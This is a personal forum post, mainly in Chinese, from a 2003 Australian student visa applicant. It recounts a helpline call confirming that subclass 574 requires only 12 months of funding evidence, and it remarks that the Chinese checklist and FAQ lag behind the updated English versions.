The designated period under subclasses 571 and 573 is the lesser of 3 years and the full period of the proposed courses of study. The designated period under subclass 574 is 12 months.
这里说574类的是designated period是12月 ,而且对于贷款的还款期限是：
in-principle approval for a “student loan” for a specified amount and with a term covering at least the designated period.
由此，我打通了那个国际长途，说了疑问：是不是574类的只提供一年的资金担保？就我来说，2.5得硕士课程，只提供第一年的就符合要求了？
那个operater立即说right,我又问了一下，她说她在确认一下，我就开始欣赏那美丽的音乐旋律了，大概听了5分钟，她情绪非常愉快的说：under subclass 574,you have to provide funds need for 12 months.然后，我还不敢相信，非常兴奋的问她，my proposed period of study is 2.5 years, you mean i don't have to provide funds need for all the 2.5 years?她说，right,the funds you need provide is for 12months.
我又说，在Student Visas FAQ里，关于资金的最后一个问题 20. When can I repay my student loan?回答有这样的话，the student loan should cover the entire period of study,这样我很迷惑。她说了一句很快的语言，我没听懂，然后说，the designated period for subclass 574 is 12 months, only 12 months.
然后她就很耐心的听我诉苦，本来拿到会计专业最棒的麦考瑞的offer,但由于汇率狂涨，我就换成了monash得offer地的申请，现在只提供一年的担保，我又可以换回麦大了！她很同情的高兴的告诉我，yes,if u like ,you have to provide your name,your date of birth......啊，差点说i love you!怕吓着她，还是说：that's really great!
如果大家以前有看过英文版的FAQ那最后一题的回答，会发现现在的最后一题的回答已经变了，回答的话语适合那个咨询officer说的一样了。我打电话的前一天都写的是entire period of study,第二天上午打了电话，下午我再上网看时，发现作了那样的修改。
通过这次新清单的修改，我发现，中文的清单及常见问题解答是完全依英文的生翻的，其翻译在表达政策的本意上有待商榷。而且中文的比英文的更新要慢。不说FAQ问题回答的英文已经更新，而中文的仍然没变；单看文件清单上的发布日期，英文的是22/10/2003，中文的是23/10/2003。
